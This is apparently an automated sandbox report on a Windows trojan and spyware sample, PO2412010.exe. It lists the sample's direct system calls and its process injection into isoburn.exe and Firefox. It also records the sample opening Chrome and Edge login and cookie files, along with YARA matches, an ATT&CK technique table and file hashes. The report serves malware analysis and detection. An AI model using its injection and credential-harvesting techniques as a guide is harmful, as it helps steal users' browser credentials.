                Source: C:\Users\user\Desktop\PO2412010.exeCode function: 3_2_01A7E420 mov eax, dword ptr fs:[00000030h]3_2_01A7E420
                Source: C:\Users\user\Desktop\PO2412010.exeCode function: 3_2_01B06420 mov eax, dword ptr fs:[00000030h]3_2_01B06420
                Source: C:\Users\user\Desktop\PO2412010.exeCode function: 3_2_01B06420 mov eax, dword ptr fs:[00000030h]3_2_01B06420
                Source: C:\Users\user\Desktop\PO2412010.exeCode function: 3_2_01B06420 mov eax, dword ptr fs:[00000030h]3_2_01B06420
                Source: C:\Users\user\Desktop\PO2412010.exeCode function: 3_2_01B06420 mov eax, dword ptr fs:[00000030h]3_2_01B06420
                Source: C:\Users\user\Desktop\PO2412010.exeCode function: 3_2_01B06420 mov eax, dword ptr fs:[00000030h]3_2_01B06420
                Source: C:\Users\user\Desktop\PO2412010.exeCode function: 3_2_01B06420 mov eax, dword ptr fs:[00000030h]3_2_01B06420
                Source: C:\Users\user\Desktop\PO2412010.exeCode function: 3_2_01B06420 mov eax, dword ptr fs:[00000030h]3_2_01B06420
                Source: C:\Users\user\Desktop\PO2412010.exeCode function: 3_2_01ABA430 mov eax, dword ptr fs:[00000030h]3_2_01ABA430
                Source: C:\Users\user\Desktop\PO2412010.exeCode function: 3_2_01AB8402 mov eax, dword ptr fs:[00000030h]3_2_01AB8402
                Source: C:\Users\user\Desktop\PO2412010.exeCode function: 3_2_01AB8402 mov eax, dword ptr fs:[00000030h]3_2_01AB8402
                Source: C:\Users\user\Desktop\PO2412010.exeCode function: 3_2_01AB8402 mov eax, dword ptr fs:[00000030h]3_2_01AB8402
                Source: C:\Users\user\Desktop\PO2412010.exeCode function: 3_2_01B0C460 mov ecx, dword ptr fs:[00000030h]3_2_01B0C460
                Source: C:\Users\user\Desktop\PO2412010.exeCode function: 3_2_01AAA470 mov eax, dword ptr fs:[00000030h]3_2_01AAA470
                Source: C:\Users\user\Desktop\PO2412010.exeCode function: 3_2_01AAA470 mov eax, dword ptr fs:[00000030h]3_2_01AAA470
                Source: C:\Users\user\Desktop\PO2412010.exeCode function: 3_2_01AAA470 mov eax, dword ptr fs:[00000030h]3_2_01AAA470
                Source: C:\Users\user\Desktop\PO2412010.exeCode function: 3_2_01B3A456 mov eax, dword ptr fs:[00000030h]3_2_01B3A456
                Source: C:\Users\user\Desktop\PO2412010.exeCode function: 3_2_01ABE443 mov eax, dword ptr fs:[00000030h]3_2_01ABE443
                Source: C:\Users\user\Desktop\PO2412010.exeCode function: 3_2_01ABE443 mov eax, dword ptr fs:[00000030h]3_2_01ABE443
                Source: C:\Users\user\Desktop\PO2412010.exeCode function: 3_2_01ABE443 mov eax, dword ptr fs:[00000030h]3_2_01ABE443
                Source: C:\Users\user\Desktop\PO2412010.exeCode function: 3_2_01ABE443 mov eax, dword ptr fs:[00000030h]3_2_01ABE443
                Source: C:\Users\user\Desktop\PO2412010.exeCode function: 3_2_01ABE443 mov eax, dword ptr fs:[00000030h]3_2_01ABE443
                Source: C:\Users\user\Desktop\PO2412010.exeCode function: 3_2_01ABE443 mov eax, dword ptr fs:[00000030h]3_2_01ABE443
                Source: C:\Users\user\Desktop\PO2412010.exeCode function: 3_2_01ABE443 mov eax, dword ptr fs:[00000030h]3_2_01ABE443
                Source: C:\Users\user\Desktop\PO2412010.exeCode function: 3_2_01ABE443 mov eax, dword ptr fs:[00000030h]3_2_01ABE443
                Source: C:\Users\user\Desktop\PO2412010.exeCode function: 3_2_01AA245A mov eax, dword ptr fs:[00000030h]3_2_01AA245A
                Source: C:\Users\user\Desktop\PO2412010.exeCode function: 3_2_01A7645D mov eax, dword ptr fs:[00000030h]3_2_01A7645D
                Source: C:\Users\user\Desktop\PO2412010.exeCode function: 3_2_01A807AF mov eax, dword ptr fs:[00000030h]3_2_01A807AF
                Source: C:\Users\user\Desktop\PO2412010.exeCode function: 3_2_01B347A0 mov eax, dword ptr fs:[00000030h]3_2_01B347A0
                Source: C:\Users\user\Desktop\PO2412010.exeCode function: 3_2_01B2678E mov eax, dword ptr fs:[00000030h]3_2_01B2678E
                Source: C:\Users\user\Desktop\PO2412010.exeCode function: 3_2_01AA27ED mov eax, dword ptr fs:[00000030h]3_2_01AA27ED
                Source: C:\Users\user\Desktop\PO2412010.exeCode function: 3_2_01AA27ED mov eax, dword ptr fs:[00000030h]3_2_01AA27ED
                Source: C:\Users\user\Desktop\PO2412010.exeCode function: 3_2_01AA27ED mov eax, dword ptr fs:[00000030h]3_2_01AA27ED
                Source: C:\Users\user\Desktop\PO2412010.exeCode function: 3_2_01B0E7E1 mov eax, dword ptr fs:[00000030h]3_2_01B0E7E1
                Source: C:\Users\user\Desktop\PO2412010.exeCode function: 3_2_01A847FB mov eax, dword ptr fs:[00000030h]3_2_01A847FB
                Source: C:\Users\user\Desktop\PO2412010.exeCode function: 3_2_01A847FB mov eax, dword ptr fs:[00000030h]3_2_01A847FB
                Source: C:\Users\user\Desktop\PO2412010.exeCode function: 3_2_01A8C7C0 mov eax, dword ptr fs:[00000030h]3_2_01A8C7C0
                Source: C:\Users\user\Desktop\PO2412010.exeCode function: 3_2_01B007C3 mov eax, dword ptr fs:[00000030h]3_2_01B007C3
                Source: C:\Users\user\Desktop\PO2412010.exeCode function: 3_2_01ABC720 mov eax, dword ptr fs:[00000030h]3_2_01ABC720
                Source: C:\Users\user\Desktop\PO2412010.exeCode function: 3_2_01ABC720 mov eax, dword ptr fs:[00000030h]3_2_01ABC720
                Source: C:\Users\user\Desktop\PO2412010.exeCode function: 3_2_01AB273C mov eax, dword ptr fs:[00000030h]3_2_01AB273C
                Source: C:\Users\user\Desktop\PO2412010.exeCode function: 3_2_01AB273C mov ecx, dword ptr fs:[00000030h]3_2_01AB273C
                Source: C:\Users\user\Desktop\PO2412010.exeCode function: 3_2_01AB273C mov eax, dword ptr fs:[00000030h]3_2_01AB273C
                Source: C:\Users\user\Desktop\PO2412010.exeCode function: 3_2_01AFC730 mov eax, dword ptr fs:[00000030h]3_2_01AFC730
                Source: C:\Users\user\Desktop\PO2412010.exe; Memory allocated: page read and write | page guard

                HIPS / PFW / Operating System Protection Evasion

                Source: C:\Program Files (x86)\oeSEyonIhOPPjnMpzLzvidfyZBcWSVVNWdJEZJldciZKroByQK\duvyEsVvTpq.exe; NtQueryVolumeInformationFile: Direct from: 0x76F12F2C
                Source: C:\Program Files (x86)\oeSEyonIhOPPjnMpzLzvidfyZBcWSVVNWdJEZJldciZKroByQK\duvyEsVvTpq.exe; NtQuerySystemInformation: Direct from: 0x76F148CC
                Source: C:\Program Files (x86)\oeSEyonIhOPPjnMpzLzvidfyZBcWSVVNWdJEZJldciZKroByQK\duvyEsVvTpq.exe; NtAllocateVirtualMemory: Direct from: 0x76F148EC
                Source: C:\Program Files (x86)\oeSEyonIhOPPjnMpzLzvidfyZBcWSVVNWdJEZJldciZKroByQK\duvyEsVvTpq.exe; NtQueryAttributesFile: Direct from: 0x76F12E6C
                Source: C:\Program Files (x86)\oeSEyonIhOPPjnMpzLzvidfyZBcWSVVNWdJEZJldciZKroByQK\duvyEsVvTpq.exe; NtReadVirtualMemory: Direct from: 0x76F12E8C
                Source: C:\Program Files (x86)\oeSEyonIhOPPjnMpzLzvidfyZBcWSVVNWdJEZJldciZKroByQK\duvyEsVvTpq.exe; NtCreateKey: Direct from: 0x76F12C6C
                Source: C:\Program Files (x86)\oeSEyonIhOPPjnMpzLzvidfyZBcWSVVNWdJEZJldciZKroByQK\duvyEsVvTpq.exe; NtSetInformationThread: Direct from: 0x76F12B4C
                Source: C:\Program Files (x86)\oeSEyonIhOPPjnMpzLzvidfyZBcWSVVNWdJEZJldciZKroByQK\duvyEsVvTpq.exe; NtClose: Direct from: 0x76F12B6C
                Source: C:\Program Files (x86)\oeSEyonIhOPPjnMpzLzvidfyZBcWSVVNWdJEZJldciZKroByQK\duvyEsVvTpq.exe; NtAllocateVirtualMemory: Direct from: 0x76F13C9C
                Source: C:\Program Files (x86)\oeSEyonIhOPPjnMpzLzvidfyZBcWSVVNWdJEZJldciZKroByQK\duvyEsVvTpq.exe; NtWriteVirtualMemory: Direct from: 0x76F1490C
                Source: C:\Program Files (x86)\oeSEyonIhOPPjnMpzLzvidfyZBcWSVVNWdJEZJldciZKroByQK\duvyEsVvTpq.exe; NtCreateUserProcess: Direct from: 0x76F1371C
                Source: C:\Program Files (x86)\oeSEyonIhOPPjnMpzLzvidfyZBcWSVVNWdJEZJldciZKroByQK\duvyEsVvTpq.exe; NtTerminateThread: Direct from: 0x76F12FCC
                Source: C:\Program Files (x86)\oeSEyonIhOPPjnMpzLzvidfyZBcWSVVNWdJEZJldciZKroByQK\duvyEsVvTpq.exe; NtCreateFile: Direct from: 0x76F12FEC
                Source: C:\Program Files (x86)\oeSEyonIhOPPjnMpzLzvidfyZBcWSVVNWdJEZJldciZKroByQK\duvyEsVvTpq.exe; NtOpenFile: Direct from: 0x76F12DCC
                Source: C:\Program Files (x86)\oeSEyonIhOPPjnMpzLzvidfyZBcWSVVNWdJEZJldciZKroByQK\duvyEsVvTpq.exe; NtQueryInformationToken: Direct from: 0x76F12CAC
                Source: C:\Program Files (x86)\oeSEyonIhOPPjnMpzLzvidfyZBcWSVVNWdJEZJldciZKroByQK\duvyEsVvTpq.exe; NtAllocateVirtualMemory: Direct from: 0x76F12BEC
                Source: C:\Program Files (x86)\oeSEyonIhOPPjnMpzLzvidfyZBcWSVVNWdJEZJldciZKroByQK\duvyEsVvTpq.exe; NtDeviceIoControlFile: Direct from: 0x76F12AEC
                Source: C:\Program Files (x86)\oeSEyonIhOPPjnMpzLzvidfyZBcWSVVNWdJEZJldciZKroByQK\duvyEsVvTpq.exe; NtSetInformationThread: Direct from: 0x76F063F9
                Source: C:\Program Files (x86)\oeSEyonIhOPPjnMpzLzvidfyZBcWSVVNWdJEZJldciZKroByQK\duvyEsVvTpq.exe; NtOpenSection: Direct from: 0x76F12E0C
                Source: C:\Program Files (x86)\oeSEyonIhOPPjnMpzLzvidfyZBcWSVVNWdJEZJldciZKroByQK\duvyEsVvTpq.exe; NtMapViewOfSection: Direct from: 0x76F12D1C
                Source: C:\Program Files (x86)\oeSEyonIhOPPjnMpzLzvidfyZBcWSVVNWdJEZJldciZKroByQK\duvyEsVvTpq.exe; NtResumeThread: Direct from: 0x76F136AC
                Source: C:\Program Files (x86)\oeSEyonIhOPPjnMpzLzvidfyZBcWSVVNWdJEZJldciZKroByQK\duvyEsVvTpq.exe; NtCreateMutant: Direct from: 0x76F135CC
                Source: C:\Program Files (x86)\oeSEyonIhOPPjnMpzLzvidfyZBcWSVVNWdJEZJldciZKroByQK\duvyEsVvTpq.exe; NtWriteVirtualMemory: Direct from: 0x76F12E3C
                Source: C:\Program Files (x86)\oeSEyonIhOPPjnMpzLzvidfyZBcWSVVNWdJEZJldciZKroByQK\duvyEsVvTpq.exe; NtNotifyChangeKey: Direct from: 0x76F13C2C
                Source: C:\Program Files (x86)\oeSEyonIhOPPjnMpzLzvidfyZBcWSVVNWdJEZJldciZKroByQK\duvyEsVvTpq.exe; NtProtectVirtualMemory: Direct from: 0x76F07B2E
                Source: C:\Program Files (x86)\oeSEyonIhOPPjnMpzLzvidfyZBcWSVVNWdJEZJldciZKroByQK\duvyEsVvTpq.exe; NtProtectVirtualMemory: Direct from: 0x76F12F9C
                Source: C:\Program Files (x86)\oeSEyonIhOPPjnMpzLzvidfyZBcWSVVNWdJEZJldciZKroByQK\duvyEsVvTpq.exe; NtSetInformationProcess: Direct from: 0x76F12C5C
                Source: C:\Program Files (x86)\oeSEyonIhOPPjnMpzLzvidfyZBcWSVVNWdJEZJldciZKroByQK\duvyEsVvTpq.exe; NtOpenKeyEx: Direct from: 0x76F12B9C
                Source: C:\Program Files (x86)\oeSEyonIhOPPjnMpzLzvidfyZBcWSVVNWdJEZJldciZKroByQK\duvyEsVvTpq.exe; NtQueryInformationProcess: Direct from: 0x76F12C26
                Source: C:\Program Files (x86)\oeSEyonIhOPPjnMpzLzvidfyZBcWSVVNWdJEZJldciZKroByQK\duvyEsVvTpq.exe; NtResumeThread: Direct from: 0x76F12FBC
                Source: C:\Program Files (x86)\oeSEyonIhOPPjnMpzLzvidfyZBcWSVVNWdJEZJldciZKroByQK\duvyEsVvTpq.exe; NtDelayExecution: Direct from: 0x76F12DDC
                Source: C:\Program Files (x86)\oeSEyonIhOPPjnMpzLzvidfyZBcWSVVNWdJEZJldciZKroByQK\duvyEsVvTpq.exe; NtReadFile: Direct from: 0x76F12ADC
                Source: C:\Program Files (x86)\oeSEyonIhOPPjnMpzLzvidfyZBcWSVVNWdJEZJldciZKroByQK\duvyEsVvTpq.exe; NtQuerySystemInformation: Direct from: 0x76F12DFC
                Source: C:\Program Files (x86)\oeSEyonIhOPPjnMpzLzvidfyZBcWSVVNWdJEZJldciZKroByQK\duvyEsVvTpq.exe; NtAllocateVirtualMemory: Direct from: 0x76F12BFC
                Source: C:\Users\user\Desktop\PO2412010.exe; Memory written: C:\Users\user\Desktop\PO2412010.exe base: 400000 value starts with: 4D5A
                Source: C:\Users\user\Desktop\PO2412010.exe; Section loaded: NULL target: C:\Program Files (x86)\oeSEyonIhOPPjnMpzLzvidfyZBcWSVVNWdJEZJldciZKroByQK\duvyEsVvTpq.exe protection: execute and read and write
                Source: C:\Users\user\Desktop\PO2412010.exe; Section loaded: NULL target: C:\Windows\SysWOW64\isoburn.exe protection: execute and read and write
                Source: C:\Windows\SysWOW64\isoburn.exe; Section loaded: NULL target: C:\Program Files (x86)\oeSEyonIhOPPjnMpzLzvidfyZBcWSVVNWdJEZJldciZKroByQK\duvyEsVvTpq.exe protection: read write
                Source: C:\Windows\SysWOW64\isoburn.exe; Section loaded: NULL target: C:\Program Files (x86)\oeSEyonIhOPPjnMpzLzvidfyZBcWSVVNWdJEZJldciZKroByQK\duvyEsVvTpq.exe protection: execute and read and write
                Source: C:\Windows\SysWOW64\isoburn.exe; Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read write
                Source: C:\Windows\SysWOW64\isoburn.exe; Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and write
                Source: C:\Windows\SysWOW64\isoburn.exe; Thread register set: target process: 8080
                Source: C:\Windows\SysWOW64\isoburn.exe; Thread APC queued: target process: C:\Program Files (x86)\oeSEyonIhOPPjnMpzLzvidfyZBcWSVVNWdJEZJldciZKroByQK\duvyEsVvTpq.exe
                Source: C:\Users\user\Desktop\PO2412010.exe; Process created: C:\Users\user\Desktop\PO2412010.exe "C:\Users\user\Desktop\PO2412010.exe"
                Source: C:\Program Files (x86)\oeSEyonIhOPPjnMpzLzvidfyZBcWSVVNWdJEZJldciZKroByQK\duvyEsVvTpq.exe; Process created: C:\Windows\SysWOW64\isoburn.exe "C:\Windows\SysWOW64\isoburn.exe"
                Source: C:\Windows\SysWOW64\isoburn.exe; Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
                Source: duvyEsVvTpq.exe, 00000005.00000000.1735182617.0000000001820000.00000002.00000001.00040000.00000000.sdmp, duvyEsVvTpq.exe, 00000005.00000002.3834328140.0000000001821000.00000002.00000001.00040000.00000000.sdmp, duvyEsVvTpq.exe, 00000009.00000000.1878108144.0000000001B01000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Shell_TrayWnd
                Source: duvyEsVvTpq.exe, 00000005.00000000.1735182617.0000000001820000.00000002.00000001.00040000.00000000.sdmp, duvyEsVvTpq.exe, 00000005.00000002.3834328140.0000000001821000.00000002.00000001.00040000.00000000.sdmp, duvyEsVvTpq.exe, 00000009.00000000.1878108144.0000000001B01000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progman
                Source: duvyEsVvTpq.exe, 00000005.00000000.1735182617.0000000001820000.00000002.00000001.00040000.00000000.sdmp, duvyEsVvTpq.exe, 00000005.00000002.3834328140.0000000001821000.00000002.00000001.00040000.00000000.sdmp, duvyEsVvTpq.exe, 00000009.00000000.1878108144.0000000001B01000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progmanlock
                Source: duvyEsVvTpq.exe, 00000005.00000000.1735182617.0000000001820000.00000002.00000001.00040000.00000000.sdmp, duvyEsVvTpq.exe, 00000005.00000002.3834328140.0000000001821000.00000002.00000001.00040000.00000000.sdmp, duvyEsVvTpq.exe, 00000009.00000000.1878108144.0000000001B01000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: yProgram Manager
                Source: C:\Users\user\Desktop\PO2412010.exeQueries volume information: C:\Users\user\Desktop\PO2412010.exe VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\PO2412010.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\PO2412010.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\PO2412010.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\PO2412010.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\PO2412010.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\PO2412010.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\PO2412010.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                Stealing of Sensitive Information

                Source: Yara match; File source: 3.2.PO2412010.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara match; File source: 3.2.PO2412010.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara match; File source: 00000003.00000002.1811060846.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match; File source: 00000006.00000002.3828928814.0000000002620000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match; File source: 00000006.00000002.3835997745.00000000043F0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match; File source: 00000003.00000002.1811863251.0000000001980000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match; File source: 00000006.00000002.3835510963.00000000041B0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match; File source: 00000009.00000002.3838073640.00000000058D0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match; File source: 00000005.00000002.3835472145.0000000002ED0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match; File source: 00000003.00000002.1813283788.0000000001F90000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: C:\Windows\SysWOW64\isoburn.exe; File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
                Source: C:\Windows\SysWOW64\isoburn.exe; File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local State
                Source: C:\Windows\SysWOW64\isoburn.exe; File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
                Source: C:\Windows\SysWOW64\isoburn.exe; File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local State
                Source: C:\Windows\SysWOW64\isoburn.exe; File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies
                Source: C:\Windows\SysWOW64\isoburn.exe; File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
                Source: C:\Windows\SysWOW64\isoburn.exe; File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies
                Source: C:\Windows\SysWOW64\isoburn.exe; File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
                Source: C:\Windows\SysWOW64\isoburn.exe; Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\

                Remote Access Functionality

                Source: Yara match; File source: 3.2.PO2412010.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara match; File source: 3.2.PO2412010.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara match; File source: 00000003.00000002.1811060846.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match; File source: 00000006.00000002.3828928814.0000000002620000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match; File source: 00000006.00000002.3835997745.00000000043F0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match; File source: 00000003.00000002.1811863251.0000000001980000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match; File source: 00000006.00000002.3835510963.00000000041B0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match; File source: 00000009.00000002.3838073640.00000000058D0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match; File source: 00000005.00000002.3835472145.0000000002ED0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match; File source: 00000003.00000002.1813283788.0000000001F90000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                | Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact |
                | --- | --- | --- | --- | --- | --- | --- | --- | --- | --- | --- | --- | --- | --- |
                | Gather Victim Identity Information | Acquire Infrastructure | Valid Accounts | Windows Management Instrumentation | 1 DLL Side-Loading | 412 Process Injection | 1 Disable or Modify Tools | 1 OS Credential Dumping | 121 Security Software Discovery | Remote Services | 1 Email Collection | 1 Encrypted Channel | Exfiltration Over Other Network Medium | Abuse Accessibility Features |
                | Credentials | Domains | Default Accounts | Scheduled Task/Job | Boot or Logon Initialization Scripts | 1 Abuse Elevation Control Mechanism | 41 Virtualization/Sandbox Evasion | LSASS Memory | 2 Process Discovery | Remote Desktop Protocol | 1 Archive Collected Data | 4 Ingress Tool Transfer | Exfiltration Over Bluetooth | Network Denial of Service |
                | Email Addresses | DNS Server | Domain Accounts | At | Logon Script (Windows) | 1 DLL Side-Loading | 412 Process Injection | Security Account Manager | 41 Virtualization/Sandbox Evasion | SMB/Windows Admin Shares | 1 Data from Local System | 5 Non-Application Layer Protocol | Automated Exfiltration | Data Encrypted for Impact |
                | Employee Names | Virtual Private Server | Local Accounts | Cron | Login Hook | Login Hook | 1 Deobfuscate/Decode Files or Information | NTDS | 1 Application Window Discovery | Distributed Component Object Model | Input Capture | 5 Application Layer Protocol | Traffic Duplication | Data Destruction |
                | Gather Victim Network Information | Server | Cloud Accounts | Launchd | Network Logon Script | Network Logon Script | 1 Abuse Elevation Control Mechanism | LSA Secrets | 2 File and Directory Discovery | SSH | Keylogging | Fallback Channels | Scheduled Transfer | Data Encrypted for Impact |
                | Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | RC Scripts | 4 Obfuscated Files or Information | Cached Domain Credentials | 113 System Information Discovery | VNC | GUI Input Capture | Multiband Communication | Data Transfer Size Limits | Service Stop |
                | DNS | Web Services | External Remote Services | Systemd Timers | Startup Items | Startup Items | 12 Software Packing | DCSync | Remote System Discovery | Windows Remote Management | Web Portal Capture | Commonly Used Port | Exfiltration Over C2 Channel | Inhibit System Recovery |
                | Network Trust Dependencies | Serverless | Drive-by Compromise | Container Orchestration Job | Scheduled Task/Job | Scheduled Task/Job | 1 Timestomp | Proc Filesystem | System Owner/User Discovery | Cloud Services | Credential API Hooking | Application Layer Protocol | Exfiltration Over Alternative Protocol | Defacement |
                | Network Topology | Malvertising | Exploit Public-Facing Application | Command and Scripting Interpreter | At | At | 1 DLL Side-Loading | /etc/passwd and /etc/shadow | Network Sniffing | Direct Cloud VM Connections | Data Staged | Web Protocols | Exfiltration Over Symmetric Encrypted Non-C2 Protocol | Internal Defacement |
                [Behavior graph: ID 1572437, Sample: PO2412010.exe, Startdate: 10/12/2024, Architecture: WINDOWS, Score: 100]

                Source | Detection | Scanner | Label | Link
                PO2412010.exe | 37% | ReversingLabs | |
                PO2412010.exe | 100% | Joe Sandbox ML | |
                No Antivirus matches
                No Antivirus matches
                No Antivirus matches
                Source | Detection | Scanner | Label | Link
                Name | IP | Active | Malicious | Antivirus Detection | Reputation
                Name | Malicious | Antivirus Detection | Reputation
                Name | Source | Malicious | Antivirus Detection | Reputation
                IP | Domain | Country | Flag | ASN | ASN Name | Malicious
                                                                      goldstarfootwear.shopUnited States
                                                                      8987AMAZONEXPANSIONGBfalse
                                                                      Joe Sandbox version:41.0.0 Charoite
                                                                      Analysis ID:1572437
                                                                      Start date and time:2024-12-10 15:13:11 +01:00
                                                                      Joe Sandbox product:CloudBasic
                                                                      Overall analysis duration:0h 11m 1s
                                                                      Hypervisor based Inspection enabled:false
                                                                      Report type:full
                                                                      Cookbook file name:default.jbs
                                                                      Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                      Number of analysed new started processes analysed:13
                                                                      Number of new started drivers analysed:0
                                                                      Number of existing processes analysed:0
                                                                      Number of existing drivers analysed:0
                                                                      Number of injected processes analysed:2
                                                                      Technologies:
                                                                      • HCA enabled
                                                                      • EGA enabled
                                                                      • AMSI enabled
                                                                      Analysis Mode:default
                                                                      Analysis stop reason:Timeout
                                                                      Sample name:PO2412010.exe
                                                                      Detection:MAL
                                                                      Classification:mal100.troj.spyw.evad.winEXE@7/1@19/12
                                                                      EGA Information:
                                                                      • Successful, ratio: 75%
                                                                      HCA Information:
                                                                      • Successful, ratio: 96%
                                                                      • Number of executed functions: 208
                                                                      • Number of non-executed functions: 282
                                                                      Cookbook Comments:
                                                                      • Found application associated with file extension: .exe
                                                                      • Override analysis time to 240000 for current running targets taking high CPU consumption
                                                                      • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, backgroundTaskHost.exe, svchost.exe
                                                                      • Excluded IPs from analysis (whitelisted): 23.218.208.109, 4.175.87.197
                                                                      • Excluded domains from analysis (whitelisted): fs.microsoft.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                                                      • Execution Graph export aborted for target duvyEsVvTpq.exe, PID 6740 because it is empty
                                                                      • Not all processes were analyzed, report is missing behavior information
                                                                      • Report creation exceeded maximum time and may have missing disassembly code information.
                                                                      • Report size exceeded maximum capacity and may have missing behavior information.
                                                                      • Report size exceeded maximum capacity and may have missing disassembly code.
                                                                      • VT rate limit hit for: PO2412010.exe
                                                                      Time | Type | Description
                                                                      09:14:17 | API Interceptor | 39x Sleep call for process: PO2412010.exe modified
                                                                      09:15:37 | API Interceptor | 8289809x Sleep call for process: isoburn.exe modified
                                                                      Process:C:\Windows\SysWOW64\isoburn.exe
                                                                      File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 7, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 7
                                                                      Category:dropped
                                                                      Size (bytes):196608
                                                                      Entropy (8bit):1.1209935793793442
                                                                      Encrypted:false
                                                                      SSDEEP:192:r2qAdB9TbTbuDDsnxCkvSAE+WslKOMq+8lZqhAj3NniAGl:r2qOB1nxCkvSAELyKOMq+8lMAjdnG
                                                                      MD5:214CFA91B0A6939C4606C4F99C9183B3
                                                                      SHA1:A36951EB26E00F95BFD44C0851827A032EAFD91A
                                                                      SHA-256:660DE0DCC188B3C35F8693DA4FE3EABD70D55A3AA32B7FDD6353FDBF04F702D7
                                                                      SHA-512:E2FA64C41FBE5C576C0D79C6A5DEF0EC0A49BB2D0D862223E761429374294332A5A218E03C78A0D9924695D84B10DC96BCFE7DA0C9972988D33AE7868B107789
                                                                      Malicious:false
                                                                      Reputation:moderate, very likely benign file
                                                                      File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                      Entropy (8bit):7.617131889326738
                                                                      TrID:
                                                                      • Win32 Executable (generic) Net Framework (10011505/4) 49.80%
                                                                      • Win32 Executable (generic) a (10002005/4) 49.75%
                                                                      • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                                                      • Windows Screen Saver (13104/52) 0.07%
                                                                      • Generic Win/DOS Executable (2004/3) 0.01%
                                                                      File name:PO2412010.exe
                                                                      File size:877'568 bytes
                                                                      MD5:60abe4a88d6c409a3a4770cef13c0222
                                                                      SHA1:ccdd09a372d79f68b96af483caf946fa9b552c56
                                                                      SHA256:cd676542bbeac4ff5dea88783c4e93b89971bdf60eaa04128f1d36078a4c2ad4
                                                                      SHA512:c569268819a2dceb77309e164c7260435423bb56fad639ae599352b1ec8c356a5182e716d3a34cf2fcd3e821e7759099c99c9206f1a5b44d370a449c7da95013
                                                                      SSDEEP:12288:0fMdnSPvncpTwOA+FtZM8y3Eol/iHoVJlHxjGa9qFutqmlbx6ubXAtwy9EXX+:pkX+5M80EzIVJlHxSNeb0GQtwFO
                                                                      TLSH:9B15E064777ECB06C9394BF40A70E67813797D9AA822D20B6ED57EDF7836F150A00683
